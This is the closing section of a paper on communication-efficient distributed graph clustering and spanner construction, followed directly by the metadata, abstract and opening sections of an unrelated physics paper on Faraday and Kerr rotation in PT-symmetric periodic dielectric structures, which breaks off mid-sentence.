\(\epsilon\in(0,1)\) and \(\rho=O(\log n)\), Alg. 3 can construct a \((1+\epsilon)\)-spectral sparsifier for \(G\) of expected size \(\tilde{O}(n)\) using communication cost \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\) in the message passing and blackboard with duplication models respectively, with probability at least \(1-n^{-c}\) for constant \(c\)._ **Clustering in the Sparsifier.** After obtaining the spectral sparsifier of the distributed graph, the coordinator applies a standard clustering algorithm such as [15] in the sparsifier to get the clustering results. We can guarantee a clustering quality nearly as good as the simple method of centralizing all graph edges and then performing a clustering algorithm. Before formally stating the results, we define a few notations. For every node set \(S\) in a graph \(G\), let its _volume_ and _conductance_ be \(vol_{G}(S)=\sum_{u\in S,v\in V}W(u,v)\) and \(\phi_{G}(S)=(\sum_{u\in S,v\in V-S}W(u,v))/vol_{G}(S)\), respectively. Intuitively, a small value of conductance \(\phi(S)\) implies that nodes in \(S\) are likely to form a cluster. A collection of subsets \(A_{1},\cdots,A_{k}\) of nodes is called a _(k-way) partition_ of \(G\) if (1) \(A_{i}\cap A_{j}=\emptyset\) for \(1\leq i\neq j\leq k\); and (2) \(\cup_{i=1}^{k}A_{i}=V\). The _k-way expansion constant_ is defined as \(\rho(k)=\min_{partitionA_{1},\cdots,A_{k}}\max_{i\in[1,k]}\phi(A_{i})\). A lower bound on \(\Upsilon_{G}(k)=\lambda_{k+1}/\rho(k)\) implies that \(G\) has exactly \(k\) well-defined clusters [14], where \(\lambda_{k+1}\) is the \(k+1\) smallest eigenvalue of the normalized Laplacian matrix. For any two sets \(X\) and \(Y\), their symmetric difference is defined as \(X\Delta Y=(X-Y)\cup(Y-X)\). **Theorem 4**.: _For a distributed graph \(G\) with \(\Upsilon_{G}(k)=\Omega(k^{3})\) and an optimal partition \(P_{1},\cdots,P_{k}\) achieving \(\rho(k)\) for some positive integer \(k\), there exists an algorithm that can output partition \(A_{1},\cdots,A_{k}\) at the coordinator such that for every \(i\in[1,k]\), \(vol(A_{i}\Delta P_{i})=O(k^{3}\Upsilon^{-1}vol(P_{i}))\) holds with probability at least \(1-n^{-c}\) for constant \(c\). The communication costs in the message passing and blackboard with duplication models are \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\), respectively._ To the best of our knowledge, this is the first algorithm for performing distributed graph clustering in the message passing and blackboard with edge duplication models. Remarkably, we can show that the communication costs are _optimal_, almost matching the communication lower bounds \(\Omega(ns)\) and \(\Omega(n+s)\), respectively. It is interesting to see that the communication costs incurred under duplication models are asymptotically the same as those under non-duplication models. In other words, edge duplication does not incur more communications in the graph clustering task, unlike other problems such as graph spanner construction as we will show in Section 4. Although we make an assumption on the edge distribution probability, we conjecture that when the assumption is relaxed, _i.e._, graph edges are presenting at different sites arbitrarily, the communication upper bounds remain the same in duplication models. We leave the study as an important future work. ## 4 Spanner Constructions in the Blackboard Model In this section, we study distributed constructions of graph spanners in the blackboard models with and without edge duplication. This, unfortunately, has not been investigated by prior work yet. We prove several interesting communication upper and lower bounds for typical graph spanners as summarized in Table 1. Due to limit of space, we cannot enumerate every result in Table 1. Hence, here we only describe the general \((2k-1)\)-spanners and move the additive spanners to the Appendix. We start with the duplication model, followed by the non-duplication model. The lower bounds obtained in Theorems 5 and 6 hold in both weighted and unweighted graphs and the rest results are on unweighted graphs. **Duplication Model.** In Section 3, we have provided the communication upper bound, \(\tilde{O}(s+n^{1+1/k})\), of constructing \((2k-1)\)-spanners in unweighted graphs in Theorem 2. We now show that the communication lower bound is \(\Omega(s+n^{1+1/k}\log s)\). **Theorem 5**.: _The communication lower bound of constructing a \((2k-1)\)-spanner in the blackboard with duplication model is \(\Omega(s+n^{1+1/k}\log s)\)._ Proof.: To prove this, we target a more general statement that works for every spanner. **Lemma 1**.: _Suppose there exists an \(n\)-vertex graph \(F\) of size \(f(n)\) such that \(F\) is the only spanner of itself or no proper subgraph \(F^{\prime}\) of \(F\) is a spanner. Then the communication complexity of computing a spanner in the blackboard with duplication model is \(\Omega(s+f(n)\log s)\) bits._ Proof.: Our proof is based on the reduction from the Multiparty Set-Disjointness problem (\(DISJ_{m,s}\)) to graph spanner computation. In \(DISJ_{m,s}\), \(s\) players receive inputs \(X_{1},X_{2},\cdots,X_{s}\subseteq\{1,\cdots,m\}\) and their goal is to determine whether or not \(\cap_{i=1}^{s}X_{i}=\emptyset\). Now we construct a distributed graph \(G\) from the graph \(F\) and an instance of \(DISJ_{f(n),s}\) as follows. We add edge \(e_{j}\) in \(F\) to site \(i\) if \(j\not\in X_{i}\) for \(1\leq j\leq f(n)\). If the coordinator outputs \(F\) as the spanner, we report \(\cap_{i=1}^{s}X_{i}=\emptyset\); otherwise we report \(\cap_{i=1}^{s}X_{i}\neq\emptyset\). It can be seen that the coordinator outputs \(F\) iff all its edges appear at some site, which is the case \(\cap_{i=1}^{s}X_{i}=\emptyset\). Finally, according to the communication lower bound of \(DISJ_{m,s}\) in the blackboard model [1], \(\Omega(s+m\log s)\), the communication complexity of computing a spanner is \(\Omega(s+f(n)\log s)\). For the lower bound of \((2k-1)\)-spanners, the Erdos's girth conjecture states that there exists a family of graphs \(F\) of girth \(2k+1\) and size \(\Omega(n^{1+1/k})\)[1]. This implies that there exists only one \((2k-1)\)-spanner of \(F\), that is \(F\) itself. It is because the deletion of any edge in \(F\) would result in that the distance between the endpoints of the edge becomes at least \(2k\). Then by Lemma 1, we get the lower bound \(\Omega(s+n^{1+1/k}\log s)\). **Non-Duplication Model.** In the non-duplication model, we prove a lower bound via a reduction from the lower bound for the duplication model. **Theorem 6**.: _The communication complexity of constructing a \((2k-1)\)-spanner in the blackboard without duplication model is \(\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})\)._ Proof.: We can construct an instance of the \((2k-1)\)-spanner problem without duplication on \(s\) sites and \(n\) vertices from an instance of the \((2k-1)\)-spanner problem with duplication on \(s\) sites and \(n/\sqrt{s}\) vertices. Specifically, we construct a graph \(G^{\prime}\) with no duplication by replacing each vertex \(v\) by a set of vertices \(S_{v}\) of size \(\sqrt{s}\). Since there are at most \(s\) copies of an edge \((u,v)\) in the original graph \(G\) across the \(s\) sites, we can assign each server's copy to a distinct edge \((u^{\prime},v^{\prime})\in S_{u}\times S_{v}\) in \(G^{\prime}\). See Fig. 2 for an illustrating example of the construction. Then we apply an algorithm for the without duplication model, _e.g._, the algorithm in Theorem 2, to get a \((2k-1)\)-spanner \(H^{\prime}\) of \(G^{\prime}\). Finally, the coordinator computes a \((2k-1)\)-spanner \(H\) of \(G\) by including an edge \((u,v)\) in \(H\) if there is at least one edge between \(S_{u}\) and \(S_{v}\) in \(H^{\prime}\). To show the constructed \(H\) is a \((2k-1)\)-spanner of \(G\), let us consider an edge \((u,v)\in G\). By construction, there must be an edge \((u^{\prime},v^{\prime})\in S_{u}\times S_{v}\) in \(G^{\prime}\). Because \(H^{\prime}\) is a \((2k-1)\)-spanner of \(G^{\prime}\), it contains a path \(P^{\prime}\) of length at most \((2k-1)\cdot W(u,v)\) between \(u^{\prime}\) and \(v^{\prime}\). For every edge \((x^{\prime},y^{\prime})\) in \(P^{\prime}\) where \(x^{\prime}\in S_{x},y^{\prime}\in S_{y}\), we have included an edge \((x,y)\) in \(H\). Therefore, there exists a path \(P\) of length at most \((2k-1)\cdot W(u,v)\) between \(u\) and \(v\) in \(H\) and thus \(H\) is a \((2k-1)\)-spanner of \(G\). Since the lower bound in the duplication model is \(\Omega(s+n^{1+1/k}\log s)\) (Theorem 5), we have that the lower bound for the non-duplication model is \(\Omega(s+(n/\sqrt{s})^{1+1/k}\log s)=\Omega(s+n^{1+1/k}s^{-1/2-1/(2k)}\log s)\). Since representing the result itself needs \(\Omega(n^{1+1/k})\), combining this with the above result get the final lower bound, \(\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})\). **Discussions.** We highlight several interesting observations from our results in Table 1 and prior results in Table 2. 1. We demonstrate that for graph spanner constructions, the blackboard model is powerful to significantly reduce the communication complexity compared to the message passing model. For instance in duplication models, computing the \((2k-1)\)-spanners incurs communication cost \(\tilde{O}(sn^{1+1/k})\) in the message passing model but only \(\tilde{O}(s+n^{1+1/k})\) in the blackboard model. This is not necessarily the case for all computing problems. For example, for computing the sum of bit vectors modulo two [13] and estimating large moments [14], the complexities are the same in both communication models. 2. To trade better communication bounds, spanners constructed in a distributed manner may include more edges than the smallest number of edges required in a centralized model. For example in \(+2\)-spanners and \(3\)-spanners, the number of edges in the constructed structure is \(n\sqrt{n+s}\), which is slightly Figure 2: Converting a graph with duplication on \(s\) sites and \(n/\sqrt{s}\) vertices into a graph without duplication on \(s\) sites and \(n\) vertices larger than the optimal size \(n\sqrt{n}\) in a centralized model. It is still open to investigate how to reduce the communication cost while maintaining an optimal number of edges in the spanner. 3. For constructing \((2k-1)\)-spanners, the upper bound \(\tilde{O}(s+n^{1+1/k})\) with a logarithmic factor hidden is very close to the lower bound \(\Omega(s+n^{1+1/k}\log s)\). There is a small gap between the upper bound \(\tilde{O}(s+n\sqrt{n+s})\) and lower bound \(\Omega(s+n^{3/2}\log s)\) for \(+2\) or \(3\)-spanners. The gap is larger in \(+k\)-spanners (for \(k>2\)) where the lower bound becomes \(\Omega(s+n^{4/3-o(1)}\log s)\). But this problem also happens in the message passing model. The construction of \(+k\)-spanners often involves more complex operations and might not be easy to adapt to distributed models. ## 5 Conclusions and Future Work In this paper, we propose the first set of algorithms that can perform distributed graph clustering and spectral sparsification under edge duplication in the two well-established communication models, the message passing and the blackboard models. We show the optimality of the achieved communication costs while maintaining a clustering quality nearly as good as a naive centralized method. We also perform the first investigation of distributed algorithms for constructing graph spanners in the blackboard under both duplication and non-duplication models. As the future work, we will study how to achieve the optimal communication complexity for distributed graph clustering while relaxing the assumption made. Furthermore, most of the existing work concentrate on global clustering but ignore local clustering which only returns the cluster of a given seed vertex. We will devise a local clustering method that hopefully enjoys communication cost not dependent on the size of the input graph and is more communication-efficient than traditional global graph clustering methods. Cut sparsifiers are another type of graph sparsifiers and they can approximately preserve all the graph cut values in the original graph. Although spectral sparsifiers are also cut sparsifiers, the latter might have smaller number of edges. Because the algorithm of [10] can be generalized to cut sparsifiers, it is promising to adapt the techniques in this work to the new problem. Finally, it is an intriguing open problem to improve the upper bounds or lower bounds and close their gap in both duplication and non-duplication models.
2301.10653
Polar magneto-optic Kerr and Faraday effects in finite periodic \texorpdfstring{$\mathcal{P}\mathcal{T}$}{PT}-symmetric systems
We discuss the anomalous behavior of the Faraday (transmission) and polar Kerr (reflection) rotation angles of the propagating light, in finite periodic parity-time ($\mathcal{P}\mathcal{T}$) symmetric structures, consisting of $N$ cells. The unit cell potential is two complex $\delta$-potentials placed on both boundaries of the ordinary dielectric slab. It is shown that, for a given set of parameters describing the system, a phase transition-like anomalous behavior of Faraday and Kerr rotation angles in a parity-time symmetric systems can take place. In the anomalous phase the value of one of the Faraday and Kerr rotation angles can become negative, and both angles suffer from spectral singularities and give a strong enhancement near the singularities. We also shown that the real part of the complex angle of KR, $\theta^{R}_1$, is always equal to the $\theta^{T}_1$ of FR, no matter what phase the system is in due to the symmetry constraints. The imaginary part of KR angles $\theta^{R^{r/l}}_2$ are related to the $\theta^{T}_2$ of FR by parity-time symmetry. Calculations based on the approach of the generalized nonperturbative characteristic determinant, which is valid for a layered system with randomly distributed delta potentials, show that the Faraday and Kerr rotation spectrum in such structures has several resonant peaks. Some of them coincide with transmission peaks, providing simultaneous large Faraday and Kerr rotations enhanced by an order one or two of magnitude. We provide a recipe for funding a one-to-one relation in between KR and FR.
Antonio Perez-Garrido, Peng Guo, Vladimir Gasparian, Esther Jódar
2023-01-25T15:52:38Z
http://arxiv.org/abs/2301.10653v1
# Polar magneto-optic Kerr and Faraday effects in finite periodic \(\mathcal{PT}\) -symmetric systems ###### Abstract We discuss the anomalous behavior of the Faraday (transmission) and polar Kerr (reflection) rotation angles of the propagating light, in finite periodic parity-time (\(\mathcal{PT}\)) symmetric structures, consisting of \(N\) cells. The unit cell potential is two complex \(\delta\)-potentials placed on both boundaries of the ordinary dielectric slab. It is shown that, for a given set of parameters describing the system, a phase transition-like anomalous behavior of Faraday and Kerr rotation angles in a parity-time symmetric systems can take place. In the anomalous phase the value of one of the Faraday and Kerr rotation angles can become negative, and both angles suffer from spectral singularities and give a strong enhancement near the singularities. We also shown that the real part of the complex angle of KR, \(\theta_{1}^{\mathrm{R}}\), is always equal to the \(\theta_{1}^{\mathrm{T}}\) of FR, no matter what phase the system is in due to the symmetry constraints. The imaginary part of KR angles \(\theta_{2}^{R^{\prime}/l}\) are related to the \(\theta_{2}^{T}\) of FR by parity-time symmetry. Calculations based on the approach of the generalized nonperturbative characteristic determinant, which is valid for a layered system with randomly distributed delta potentials, show that the Faraday and Kerr rotation spectrum in such structures has several resonant peaks. Some of them coincide with transmission peaks, providing simultaneous large Faraday and Kerr rotations enhanced by an order one or two of magnitude. We provide a recipe for funding a one-to-one relation in between KR and FR. ## I Introduction The study of the magneto-optic effects (Faraday rotation (FR) and Kerr rotation (KR)), has played an important role in the development both of electromagnetic theory and atomic physics. The magneto-optical materials that exhibiting FR and KR are essential for optical communication technology [1; 2; 3], optical amplifiers [4; 5], and photonic crystals [6; 7]. In addition to this important application, the KR is also an extremely accurate and versatile research tool and can be used to determine quantities as varied as anisotropy constants, exchange-coupling strengths and Curie temperatures (see, e.g., [8].) In polar or magneto-optical Kerr effect, the magnetization of the system is in the plane of incidence and perpendicular to the reflecting surface. Reflection can produce several effects, including 1) rotation the direction of light polarization, 2) introducing ellipticity into the reflected beam, and 3) changing by the intensity of the reflected beam. FR is similar to KR in terms of rotation and ellipticity and has a wide range of applications in various fields of modern physics, such as measuring magnetic field in astronomy [9] and construction of optical isolators for fiber-optic telecommunication systems [10], as well as the design of optical circulators used in the development of microwave integrated circuits. [11; 12; 13]. Note, that large Faraday and Kerr rotations are needed for all the applications mentioned. However, the standard method, based on increasing the sample size or applying a strong external magnetic field, is currently ineffective due to the small size of systems in which the de Broglie wavelength is compatible with the size of quantum devices. In other words, thin film materials exhibiting a large FR angle should be desirable for promote progress optical integrated circuits. A large enhancement of the FR and as well as a change in the sign of the FR can be obtained by incorporating several nanoparticles and their composites in nanomaterials, see e.g. Refs. [14; 15; 16]. A phase transition-like anomalous behavior of Faraday rotation angles in a simple parity-time \(\mathcal{PT}\)-symmetric model of a regular dielectric slab was reported recently in Ref.[17]. In anomalous phase, the value of one of Faraday rotation angles turns negative, and both angles suffer spectral singularities and yield strong enhancement near singularities. As for the enhancing of the KR, in which we are interested too, it is mainly related to spin-orbit coupling strength [18], to interference effects [19] and as well as by the plasma resonance of the free carriers of magnetic materials [20]. As it was mentioned in Ref. [21], with addition of a gold nano-disc to the periodic magnetic system, yields a strong wavelength-dependent enhancement of the KR. Generally, the enhancement factor is expected to be less than three even for materials with high refractive index \(\approx 2\), such as semiconductors with zero extinction coefficients in the near or mid infrared range (like tellurium or aluminum gallium arsenide). In this paper we aim to present a complete and quantitative theoretical description of the Faraday and Kerr complex rotations for an arbitrary one dimensional finite periodic \(\mathcal{PT}\)-symmetric system, consisting from (2N+1) cells for some simple cases we give simple closed form expressions, describing the FR and KR. We illustrate that the Faraday and Kerr rotation angles of the polarized light traveling through a \(\mathcal{PT}\)-symmetric periodic structure display phase transition-like anomalous behaviors. In one phase (normal phase), the FR and KR angles behave normally as in regular passive system with a positive permittivity, and stay positive all the time as expected. In the second anomalous phase, the angle of FR and KR angles may change the sign and turn into negative. In addition, spectral singularities arise in the second anomalous phase, where the angles FR and KR increase strongly. In this sense, \(\mathcal{PT}\)-systems seem to be a good candidate for constructing fast tunable and switchable polarization rotational ultrathin magneto-optical devices in a wide frequency range with a giant FR and KR rotations. Despite that the obtained results are, in general, only suitable for numerical analysis. However, in some simple cases approximate expressions can be derived and a qualitative discussion is possible. The paper is organized as follows. In Sec. II the complex Faraday and Kerr effects are introduced and discussed for \(\mathcal{PT}\)-symmetric unit cell with two complex \(\delta\)-potentials. We will assume that the strengths of two Dirac \(\delta\) functions \(Z_{1}\) and \(Z_{2}\) are arbitrary complex numbers. The periodic system with \(2N+1\) cells is is discussed in Sec. III. Followed by the discussions and summary in Sec. IV. ## II General theory of Faraday and Kerr effects in \(\mathcal{PT}\)-symmetric dielectric slabs In this section, before discussing in detail the Faraday and Kerr effects in a simple unit cell--an ordinary dielectric slab with two complex \(\delta\)-potentials located at both boundaries (the unit cell located symmetrically about \(x_{0}=0\) in Fig. 1), we present some details of the rotation angle calculation for an arbitrary one-dimensional dielectric permittivity profile \(\epsilon(x)\). Later, we will impose the condition \(\epsilon(x)=\epsilon^{*}(-x)\), which guarantees the system is \(\mathcal{PT}\)-symmetric, that its eigenstates are real-valued solutions. In such a \(\mathcal{PT}\)-symmetric dielectric system with a finite spatial extension in \(x\) direction (see Fig. 1), the permittivity of the system (as well as the single slab) has a balanced gain and loss. Assume a linearly polarized electromagnetic plane wave with angular frequency \(\omega\) enters the system from the left at normal incidence propagating along the \(x\) direction. The polarization direction of electric field of incident wave is taken as the z-axis: \(\mathbf{E}_{0}(x)=e^{ik_{0}x}\hat{z}\), where \(k_{0}=\frac{\omega}{c}\sqrt{\epsilon_{0}}\) stands for the wave vector and \(\epsilon_{0}\) denotes the dielectric constant of vacuum. A weak magnetic field \(\mathbf{B}\), which preserves the linearity of Maxwell's equations, is applied in the \(x\)-direction and is confined into the system, see Fig.1. The scattering of incident wave by the system is described by Schrodinger-like equations, see e.g. Refs. [22; 23], \[\left[\frac{d^{2}}{dx^{2}}+\frac{\omega^{2}\epsilon_{\pm}(x)}{c^{2}}\right]E _{\pm}(x)=0, \tag{1}\] Figure 1: Schematic of a one-dimesnionl \(\mathcal{PT}\)-symmetric photonic heterostructure, consisting of \(2N+1\) arbitrary number of slabs that are \(\mathcal{PT}\) -symmetric about \(x_{0}=0\), that is \(\epsilon(x)=\epsilon^{*}(-x)\). Each slab of the photonic heterostructure, has two balanced complex tiny slabs placed at both ends of a real dielectric slab. The green slab indicates the loss and the red slab indicates the gain region. where \(E_{\pm}=E_{y}\pm iE_{z}\) are circularly polarized electric fields. The \(\epsilon_{\pm}(x)\) is defined, \[\epsilon_{\pm}(x)=\begin{cases}\epsilon(x)\pm g,&x\in[-\frac{L}{2}-N(L+L_{0}), \frac{L}{2}+N(L+L_{0})],\\ \epsilon_{0},&\text{otherwise},\end{cases} \tag{2}\] where \((L,L_{0},2N+1)\) stand for spatial extent of a unit cell, the spatial separation of neighbouring two cells and number of cells, see Fig. 1. The \(g\) is the gyrotropic vector along the magnetic-field direction. The external magnetic field \(\mathbf{B}\) is included into the gyrotropic vector \(g\) to make the calculations valid for the cases of both external magnetic fields and magneto-optic materials. When the reflection within the boundaries is important, the outgoing transmitted/reflected wave is generally elliptically polarized even without absorption, where the major axis of the ellipse is rotated with respect to the original direction of polarization and the maximum FR (KR) angle does not necessarily coincide with angular frequencies \(\omega\) of light at which zero ellipticity can be measured. The real part of the rotation angle describes the change of polarization in linearly polarized light. The imaginary part describes the ellipticity of transmitted or reflected light. Once we know the scattering matrix elements \(r_{\pm}(\omega)\) and \(t_{\pm}(\omega)\) of the one-dimensional light propagation problem, e.g. the reflection and transmission amplitudes with an incoming propagating wave from left are defined by \[E_{\pm}(x)\rightarrow\begin{cases}\pm i\left[e^{ik_{0}x}+r_{\pm}(\omega)e^{- ik_{0}[x+L+2N(L+L_{0})]}\right],&x\rightarrow-\infty,\\ \pm it_{\pm}(\omega)e^{ik_{0}[x-L-2N(L+L_{0})]},&x\rightarrow+\infty.\end{cases} \tag{3}\] The two characteristic rotational parameters of transmitted light (magneto-optical measurements of complex Faraday angle) can be written as a complex form as (see, e.g., Refs. [22; 23]) \[\theta_{1}^{T}=\frac{\psi_{+}^{T}-\psi_{-}^{T}}{2},\hskip 14.226378pt\theta_{2}^ {T}=\frac{1}{4}\ln\frac{T_{+}}{T_{-}}, \tag{4}\] where \(T_{\pm}\) and \(\psi_{\pm}^{T}\) are the transmission coefficients and phase of transmission amplitudes, \(t_{\pm}=\sqrt{T_{\pm}}e^{i\psi_{\pm}^{T}}\), of transmitted electric fields. For weak magnetic field (\(g\ll 1\)), the perturbation expansion in terms of weak magnetic field can be applied. The leading order contribution can be obtained by expanding \(\psi_{\pm}\) and \(T\pm\) around the refractive index of the slab in the absence of the magnetic field B: \[\theta_{1}^{T}=\frac{g}{2n}\frac{\partial\psi^{T}}{\partial n},\hskip 14.226378pt \theta_{2}^{T}=\frac{g}{4n}\frac{\partial\ln T}{\partial n}, \tag{5}\] where \(n=\sqrt{\epsilon}\) is the refractive index of the slab. The Kerr rotation complex angles are defined in a similar way as in Eq.(4). In the weak magnetic field, the leading order expressions can be written in the form \[\theta_{1}^{R}=\frac{g}{2n}\frac{\partial\psi^{R}}{\partial n},\hskip 14.226378pt \theta_{2}^{R}=\frac{g}{4n}\frac{\partial\ln R}{\partial n}, \tag{6}\] where \(R\) and \(\psi^{R}\) are the reflection coefficients and phase of reflection amplitudes in the absence of magnetic field B: \(r(\omega)=\sqrt{R}e^{i\psi^{R}}\). We remark that FR and KR angles are not all independent due to the constraints of \(\mathcal{PT}\) symmetry. As mentioned in Ref. [24], the parametrization of scattering matrix only requires three independent real functions in a \(\mathcal{PT}\)-symmetric system: one inelasticity, \(\eta\in[1,\infty]\), and two phaseshifts, \(\delta_{1,2}\). In terms of \(\eta\) and \(\delta_{1,2}\), the reflection and transmission amplitudes are given by \[t=t^{r}=t^{l}=\eta\frac{e^{2i\delta_{1}}+e^{2i\delta_{2}}}{2},\hskip 14.226378ptr ^{r/l}=\eta\frac{e^{2i\delta_{1}}-e^{2i\delta_{2}}}{2}\pm i\sqrt{\eta^{2}-1}e ^{i(\delta_{1}+\delta_{2})}, \tag{7}\] where subscript \((r/l)\) are used to label amplitudes corresponding to two independent boundary conditions: right (\(e^{ik_{0}x}\)) and left (\(e^{-ik_{0}x}\)) propagating incoming waves respectively. Therefore we find relations: \[\sqrt{T}=\eta\cos(\delta_{1}-\delta_{2}),\hskip 14.226378pt\psi^{T}=\delta_{1}+ \delta_{2},\hskip 14.226378pt\sqrt{R^{r/l}}=\left|\eta\sin(\delta_{1}-\delta_{2}) \pm\sqrt{\eta^{2}-1}\right|,\hskip 14.226378pt\psi^{R}=\psi^{T}+\frac{\pi}{2}, \tag{8}\] and the pseudounitary conservation relations take place (see, e.g. Refs.[25; 26; 27]): \[|T-1|=\sqrt{R^{l}R^{r}}. \tag{9}\] The FR and KR angles are given by \[\theta_{1}^{T}=\theta_{1}^{R}=\frac{g}{2n}\frac{\partial(\delta_{1}+\delta_{2})}{ \partial n},\ \ \ \ \theta_{2}^{T}=\frac{g}{2n}\frac{\partial}{\partial n}\ln\left[\eta\cos( \delta_{1}-\delta_{2})\right],\ \ \ \ \theta_{2}^{R^{r/l}}=\frac{g}{2n}\frac{\partial}{\partial n}\ln\left|\eta\sin( \delta_{1}-\delta_{2})\pm\sqrt{\eta^{2}-1}\right|. \tag{10}\] The \(\theta_{2}^{R^{r/l}}\) and \(\theta_{2}^{T}\) are hence related by \[\frac{\theta_{2}^{R^{r}}+\theta_{2}^{R^{l}}}{2}=\frac{T}{T-1}\theta_{2}^{T}. \tag{11}\] We thus conclude that only three FR and KR angles are independent due to the symmetry constraints. The special case of zero inelasticity (\(\eta=0\)) thus represents the results for real spatially symmetric dielectric systems with \(\epsilon(x)=\epsilon(-x)\) and \(Im[\epsilon(x)]=0\), hence \[\theta_{2}^{T\ Im[\epsilon(x)]\to 0}\ \frac{g}{2n}\frac{\partial}{\partial n}\ln \cos(\delta_{1}-\delta_{2}),\ \ \ \ \theta_{2}^{R^{r/l}\ Im[\epsilon(x)]\to 0}\ \frac{g}{2n}\frac{\partial}{ \partial n}\ln\left|\sin(\delta_{1}-\delta_{2})\right|. \tag{12}\] III Unit cell: two complex \(\delta\)-potentials placed on both boundaries of the ordinary dielectric slab We first present some main results of FR and KR for a unit cell in this section, all the technical details can be found in Appendix A. The properties of the spectral singularities are also discussed in current section, and we draw attention to the parameter ranges where a phase-like transition can take place for both Faraday and Kerr effects. A simple \(\mathcal{PT}\)-symmetric model for a unit cell is adopted in this work: two complex \(\delta\)-potential are placed at both ends of the dielectric slab, \[\epsilon(x)=\epsilon+Z_{1}\delta(x+\frac{L}{2})+Z_{2}\delta(x-\frac{L}{2}),\ \ \ \ Z_{1}=V_{1}+iV_{2},\ \ \ \ Z_{2}=Z_{1}^{*}, \tag{13}\] where \(L\) denotes the spatial extent of unit cell of dielectric slab and \(\epsilon>0\) is positive and real permittivity of slab. The transmission \(t_{0}(\omega)\) and reflection \(r_{0}(\omega)\) amplitudes for the unit cell can be obtained rather straightforwardly by matching boundary condition method or using explicit form of characteristic determinant \(D_{2}\) in Eq.(12). First of all, inserting Eq.(11) in Eq.(13) and also using (10) it is easy to see that \(t_{0}(\omega)\), phase \(\psi^{T}\) and transmission coefficient \(T_{0}\) for a unit cell are respectively given by \[t_{0}(\omega)=\sqrt{T_{0}}e^{i\psi^{T}}=\frac{\csc\left(\frac{\omega n}{c}L \right)}{\mathcal{R}(\omega)-i\mathcal{I}(\omega)},\ \ \ \ \psi^{T}=\tan^{-1}\left[\frac{\mathcal{I}(\omega)}{\mathcal{R}(\omega)}\right], \ \ \ \ T_{0}=\frac{\csc^{2}\left(\frac{\omega n}{c}L\right)}{\mathcal{R}^{2}( \omega)+\mathcal{I}^{2}(\omega)}, \tag{14}\] where \[\mathcal{R}(\omega)=\cot\left(\frac{\omega n}{c}L\right)-\frac{\omega V_{1}}{ cn},\ \ \ \ \mathcal{I}(\omega)=\frac{\omega V_{1}}{cn_{0}}\cot\left(\frac{\omega n}{c}L \right)+\frac{1}{2}(\frac{n}{n_{0}}+\frac{n_{0}}{n})-\frac{\omega^{2}}{2c^{2} n_{0}n}\left(V_{1}^{2}+V_{2}^{2}\right). \tag{15}\] The \(n=\sqrt{\epsilon}\) and \(n_{0}=\sqrt{\epsilon_{0}}\) denote the refractive index of the dielectric slab and vacuum respectively. We remark that unphysical units are adopted throughout the rest of presentation: the length of slab \(L\) is used to sent up the physical scale, \(V_{1,2}\) and \(\epsilon=n^{2}\) hence carry the dimensions of \(1/L\) and \(1/L^{2}\) respectively. The \(\omega/c\) is a dimensionless quantity. Next the reflection amplitude \(r_{0}^{r/l}(\omega)\) to the left/right of an individual cell can be obtained conveniently from the following relation related to the derivative of the transmission amplitude \(t_{0}(Z_{1},Z_{2})\) with respect to \(Z_{1}/Z_{2}\) located on the left/right border of the slab, see Ref. [28]: \[r_{0}^{r}(\omega)=-i\frac{cn_{0}}{\omega}\frac{\partial\ln t_{0}(\omega)}{ \partial Z_{1}}-1,\ \ \ \ r_{0}^{l}(\omega)=-i\frac{cn_{0}}{\omega}\frac{\partial\ln t_{0}(\omega)}{ \partial Z_{2}}-1. \tag{16}\] Hence we find \[r_{0}^{r/l}(\omega)=\sqrt{R_{0}^{r/l}}e^{i\psi^{R}}=i\frac{Q^{r/l}(\omega)}{ \mathcal{R}(\omega)-i\mathcal{I}(\omega)},\ \ \ \ \psi^{R}=\tan^{-1}\left[\frac{\mathcal{I}(\omega)}{\mathcal{R}(\omega)}\right]+ \frac{\pi}{2},\ \ \ \ R_{0}^{r/l}=\frac{\left[Q^{r/l}(\omega)\right]^{2}}{\mathcal{R}^{2}( \omega)+\mathcal{I}^{2}(\omega)}, \tag{17}\] where \[Q^{r/l}(\omega)=\frac{\omega V_{1}}{cn_{0}}\cot\left(\frac{\omega n}{c}L\right) +\frac{1}{2}\bigg{(}\frac{n}{n_{0}}-\frac{n_{0}}{n}\bigg{)}\pm\frac{\omega V_{2 }}{cn}-\frac{\omega^{2}}{2c^{2}n_{0}n}\left(V_{1}^{2}+V_{2}^{2}\right). \tag{18}\] Note, that in case of \(n_{0}=n\) we recover the result of a reflection amplitude from a simple diatomic system, discussed in Ref. [29]. It is easy to verify that the phase of the reflection amplitude indeed coincides with the phase of the transmission amplitude as previously discussed. Later, in the next subsections we used these expressions to illustrate a number of quite general features of Faraday and Kerr rotations in \(\mathcal{PT}\)-symmetric periodic systems. A simple inspection of the Eq.(14), show that replacing \(\omega\) with \(-\omega\) does not affect \(t_{0}(\omega)\), which means that the transmission is equal for the left-to-right and right-to-left scattering, that is \(t_{0}^{t}(\omega)=t_{0}^{r}(-\omega)\equiv t_{0}(\omega)\). The situation is somewhat more complicated in the case of the reflection amplitude in Eq.(17). Simultaneous sign change of both \(\omega\) and \(V_{2}\) is required to satisfy the condition \(r_{0}^{l}(-\omega,-V_{2})=r_{0}^{r}(\omega,V_{2})\). There in fact are indeed the general properties of \(\mathcal{PT}\) systems, see e.g. Eq.(B33) in Ref. [24]. ### Spectral singularities in a unit cell We now turn to a closer investigation of the spectral singularities for FR and KR angles. Spectral singularities are spectral points belonging to non-Hermitian Hamiltonian operators with \(\mathcal{PT}\)-symmetry, characterized by real energies. At these energies, the reflection and transmission coefficients tend to infinity, i.e., they correspond to resonances having zero width. Interesting to note that a slight imbalance between gain and loss regions, can change the shape of the transition from zero width to the symmetric shape of the "bell curve" (for more details see Ref. [17]). For our model and for FR and KR rotational effects, spectral singularities arise when both conditions, \(\mathcal{R}(\omega)=0\) and \(\mathcal{I}(\omega)=0\), are satisfied simultaneously, see Eq.(15). By solving Eq.(15) for \(\cot(kL)\) and \(\omega\) one obtains straightforwardly \[\left(\frac{\omega_{cr}|V|}{c}\right)^{2}\cos 2\varphi_{V}+n^{2}+n_{0}^{2}=0, \hskip 14.226378pt|V|=\sqrt{V_{1}^{2}+V_{2}^{2}}, \tag{19}\] where \(\tan(\varphi_{V})=\frac{\mathcal{I}(\omega_{cr})}{\mathcal{R}(\omega_{cr})}\). The condition necessary for the existence of a solution of the spectral singularities exist only 